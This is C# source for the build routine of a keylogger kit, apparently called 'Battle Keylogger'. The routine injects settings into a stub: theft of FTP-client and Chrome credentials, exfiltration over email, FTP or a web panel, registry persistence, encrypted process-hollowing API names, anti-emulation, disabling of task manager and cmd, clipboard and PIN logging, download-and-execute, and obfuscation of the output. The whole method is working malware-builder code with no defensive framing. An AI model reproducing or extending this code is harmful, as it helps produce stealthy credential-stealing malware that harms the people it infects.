示例#1
0
        private void BuildFile(object args)
        {
            string savePath = args.ToString();
            Action test     = () =>
            {
                listView3.Items.Clear();
                listView3.Items.Add("> Starting build...");
                listView3.Items.Add("> Reading settings...");
            };

            listView3.Invoke(test);

            //
            //

            string mutex = slcTextBox14.Text;

            if (string.IsNullOrEmpty(mutex))
            {
                mutex = Guid.NewGuid().ToString();
            }
            try
            {
                AssemblyDefinition a = AssemblyDefinition.ReadAssembly(Application.StartupPath + "\\stub.bin");
                //MonoHelper.ReplaceString("[PAYLOAD]", payLoad, a);
                MonoHelper.ReplaceString("[MUTEX]", mutex, a);
                MonoHelper.ReplaceString("[HWID]", HWID, a);
                MonoHelper.ReplaceString("[LOGINTERVAL]", slcTextBox9.Text, a);



                MonoHelper.ReplaceString("[REGISTRYPATH]", StringCipher.Encrypt(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", mutex), a);
                MonoHelper.ReplaceString("[ZONEID]", StringCipher.Encrypt(":Zone.Identifier", mutex), a);
                MonoHelper.ReplaceString("[REGISTRYCOREFTP]", StringCipher.Encrypt(@"HKEY_CURRENT_USER\Software\FTPWare\COREFTP\Sites\", mutex), a);
                MonoHelper.ReplaceString("[SITEMANAGER]", StringCipher.Encrypt("sitemanager.xml", mutex), a);
                MonoHelper.ReplaceString("[RECENTSERVERS]", StringCipher.Encrypt("recentservers.xml", mutex), a);
                MonoHelper.ReplaceString("[CHROMEPATH]", StringCipher.Encrypt(@"\Google\Chrome\User Data\Default\", mutex), a);

                //MonoHelper.ReplaceString("[CreateProcessW]", StringCipher.Encrypt("CreateProcessW", mutex), a);
                MonoHelper.ReplaceString("[GetThreadContext]", StringCipher.Encrypt("GetThreadContext", mutex), a);
                MonoHelper.ReplaceString("[NtUnmapViewOfSection]", StringCipher.Encrypt("NtUnmapViewOfSection", mutex), a);
                MonoHelper.ReplaceString("[ReadProcessMemory]", StringCipher.Encrypt("ReadProcessMemory", mutex), a);
                MonoHelper.ReplaceString("[ResumeThread]", StringCipher.Encrypt("ResumeThread", mutex), a);
                MonoHelper.ReplaceString("[SetThreadContext]", StringCipher.Encrypt("SetThreadContext", mutex), a);
                MonoHelper.ReplaceString("[VirtualAllocEx]", StringCipher.Encrypt("VirtualAllocEx", mutex), a);
                MonoHelper.ReplaceString("[Wow64GetThreadContext]", StringCipher.Encrypt("Wow64GetThreadContext", mutex), a);
                MonoHelper.ReplaceString("[Wow64SetThreadContext]", StringCipher.Encrypt("Wow64SetThreadContext", mutex), a);
                MonoHelper.ReplaceString("[WriteProcessMemory]", StringCipher.Encrypt("WriteProcessMemory", mutex), a);



                //Always things here


                //Now settings

                if (rbEmail.Checked)
                {
                    MonoHelper.ReplaceString("[UPLOADMETHOD]", "EMAIL", a);
                }
                else if (rbFTP.Checked)
                {
                    MonoHelper.ReplaceString("[UPLOADMETHOD]", "FTP", a);
                }
                else if (rbWeb.Checked)
                {
                    MonoHelper.ReplaceString("[UPLOADMETHOD]", "PHP", a);
                }


                MonoHelper.ReplaceString("[EMAILUSERNAME]", StringCipher.Encrypt(slcTextBox2.Text, mutex), a);
                MonoHelper.ReplaceString("[EMAILPASSWORD]", StringCipher.Encrypt(slcTextBox5.Text, mutex), a);
                MonoHelper.ReplaceString("[EMAILPORT]", StringCipher.Encrypt(slcTextBox6.Text, mutex), a);
                if (slcCheckbox1.Checked)
                {
                    MonoHelper.ReplaceString("[EMAILSSL]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[EMAILSSL]", string.Empty, a);
                }
                MonoHelper.ReplaceString("[EMAILSERVER]", StringCipher.Encrypt(slcTextBox4.Text, mutex), a);
                MonoHelper.ReplaceString("[FTPUSERNAME]", StringCipher.Encrypt(slcTextBox7.Text, mutex), a);
                MonoHelper.ReplaceString("[FTPPASSWORD]", StringCipher.Encrypt(slcTextBox3.Text, mutex), a);
                MonoHelper.ReplaceString("[FTPSERVER]", StringCipher.Encrypt(slcTextBox8.Text, mutex), a);
                MonoHelper.ReplaceString("[WEBPANELKEY]", StringCipher.Encrypt(slcTextBox1.Text, mutex), a);
                MonoHelper.ReplaceString("[WEBPANEL]", StringCipher.Encrypt(WEBPANEL, mutex), a);

                //Install Tab
                if (install.Toggled)
                {
                    String tVAr = "";
                    Invoke(new MethodInvoker(() => tVAr = (slcComboBox1.SelectedIndex + 1).ToString()));

                    //Invoke(new Action( tVAr = (comboBoxDirectory.SelectedIndex + 1).ToString()));

                    MonoHelper.ReplaceString("[INSTALLFILE]", Guid.NewGuid().ToString(), a);
                    MonoHelper.ReplaceString("[PATHTYPE]", tVAr, a);
                    MonoHelper.ReplaceString("[FOLDER]", slcTextBox11.Text, a);
                    MonoHelper.ReplaceString("[FILENAME]", slcTextBox12.Text, a);
                }
                else
                {
                    MonoHelper.ReplaceString("[INSTALLFILE]", string.Empty, a);
                }

                if (slcCheckbox2.Checked)
                {
                    MonoHelper.ReplaceString("[HKCU]", slcTextBox13.Text, a);
                }
                else
                {
                    MonoHelper.ReplaceString("[HKCU]", string.Empty, a);
                }

                if (slcCheckbox3.Checked)
                {
                    MonoHelper.ReplaceString("[HKLM]", slcTextBox10.Text, a);
                }
                else
                {
                    MonoHelper.ReplaceString("[HKLM]", string.Empty, a);
                }

                if (slcCheckbox5.Checked)
                {
                    MonoHelper.ReplaceString("[REGPERSISTENCE]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[REGPERSISTENCE]", string.Empty, a);
                }

                if (slcCheckbox4.Checked)
                {
                    MonoHelper.ReplaceString("[HIDEFILE]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[HIDEFILE]", string.Empty, a);
                }
                //
                //General Tab
                if (slcCheckbox6.Checked)
                {
                    MonoHelper.ReplaceString("[CLIPBOARD]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[CLIPBOARD]", string.Empty, a);
                }

                if (slcCheckbox7.Checked)
                {
                    MonoHelper.ReplaceString("[MODIFYTASK]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[MODIFYTASK]", string.Empty, a);
                }

                if (slcCheckbox9.Checked)
                {
                    MonoHelper.ReplaceString("[MELTFILE]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[MELTFILE]", string.Empty, a);
                }

                if (slcCheckbox8.Checked)
                {
                    MonoHelper.ReplaceString("[SCREENSHOTS]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[SCREENSHOTS]", string.Empty, a);
                }

                if (slcCheckbox13.Checked)
                {
                    MonoHelper.ReplaceString("[ANTIEMULATION]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[ANTIEMULATION]", string.Empty, a);
                }

                if (slcCheckbox12.Checked)
                {
                    MonoHelper.ReplaceString("[PROCESSPROTECTION]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[PROCESSPROTECTION]", string.Empty, a);
                }

                if (slcCheckbox11.Checked)
                {
                    MonoHelper.ReplaceString("[PINLOGGER]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[PINLOGGER]", string.Empty, a);
                }

                if (slcCheckbox10.Checked)
                {
                    MonoHelper.ReplaceString("[CLEARSAVED]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[CLEARSAVED]", string.Empty, a);
                }

                if (slcCheckbox22.Checked)
                {
                    MonoHelper.ReplaceString("[URL]", slcTextBox26.Text, a);
                }
                else
                {
                    MonoHelper.ReplaceString("URL", string.Empty, a);
                }

                //
                //Miscellaneous Tab
                if (slcCheckbox14.Checked)
                {
                    String tvar = "";
                    Invoke(new MethodInvoker(() => tvar = slcTextBox16.Text));
                    MonoHelper.ReplaceString("[DOWNLOADURL]", slcTextBox15.Text, a);
                    MonoHelper.ReplaceString("[TYPE]", tvar, a);
                }
                else
                {
                    MonoHelper.ReplaceString("[DOWNLOADURL]", string.Empty, a);
                    MonoHelper.ReplaceString("[TYPE]", string.Empty, a);
                }

                if (slcCheckbox15.Checked)
                {
                    String tvar = "";
                    Invoke(new MethodInvoker(() => tvar = slcComboBox2.Text));
                    MonoHelper.ReplaceString("[MTYPE]", tvar, a);
                    MonoHelper.ReplaceString("[MTITLE]", slcTextBox17.Text, a);
                    MonoHelper.ReplaceString("[MBODY]", slcTextBox18.Text, a);
                }
                else
                {
                    MonoHelper.ReplaceString("[MTYPE]", string.Empty, a);
                }

                if (slcCheckbox1.Checked)
                {
                    MonoHelper.ReplaceString("[DELAY]", slcTextBox19.Text, a);
                }
                else
                {
                    MonoHelper.ReplaceString("[DELAY]", "0", a);
                }

                if (slcOnOffBox1.Toggled)
                {
                    MonoHelper.ReplaceString("[STEALER]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[STEALER]", string.Empty, a);
                }



                if (slcCheckbox20.Checked)
                {
                    MonoHelper.ReplaceString("[TASKMGR]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[TASKMGR]", string.Empty, a);
                }

                if (slcCheckbox18.Checked)
                {
                    MonoHelper.ReplaceString("[CMD]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[CMD]", string.Empty, a);
                }

                if (slcCheckbox19.Checked)
                {
                    MonoHelper.ReplaceString("[REGISTRY]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[REGISTRY]", string.Empty, a);
                }

                if (slcCheckbox21.Checked)
                {
                    MonoHelper.ReplaceString("[BOTKILL]", Guid.NewGuid().ToString(), a);
                }
                else
                {
                    MonoHelper.ReplaceString("[BOTKILL]", string.Empty, a);
                }



                Action doneSettings = () =>
                {
                    listView3.Items.Add("> Settings done...");
                };
                listView3.Invoke(doneSettings);


                a.Write(savePath);
                //if (cbChangeIcon.Checked && !string.IsNullOrEmpty(tbIconPath.AmbianceTB.Text))
                //    IconInjector.InjectIcon(savePath, tbIconPath.AmbianceTB.Text);
                listView3.Invoke((MethodInvoker) delegate { listView3.Items.Add("> Obfuscating file..."); });
                Process.Start(Application.StartupPath + "\\Obfuscator\\Obfuscator.exe", string.Format("\"{0}\" {1}", savePath, "3"));
                Thread.Sleep(3000);
                //ObfuscateCode(savePath);
                while (!File.Exists(savePath + "-Renamed.exe"))
                {
                    Thread.Sleep(500);
                }
                File.Delete(savePath);
                File.Move(savePath + "-Renamed.exe", savePath);
                //if (cbChangeAssembly.Checked)
                //{
                //    //string changeAsmArgs = string.Format("{0} {1} /va /s title {2} /s desc {3} /s company {4} /s product {5} /s copyright {6}", savePath, tbVersion.Text, tbTitle.Text, tbDescription.Text, tbCompany.Text, tbProduct.Text, tbCopyright.Text);
                //    //Process.Start(Application.StartupPath + "\\verpatch.exe", changeAsmArgs);
                //}
                listView3.Invoke((MethodInvoker) delegate { listView3.Items.Add("> File saved @ " + savePath); });

                MessageBox.Show("Battle Keylogger Built!", "Success", MessageBoxButtons.OK, MessageBoxIcon.Information);
            }
            catch (Exception e)
            {
                MessageBox.Show(e.Message, "Failure", MessageBoxButtons.OK, MessageBoxIcon.Information);
            }
        }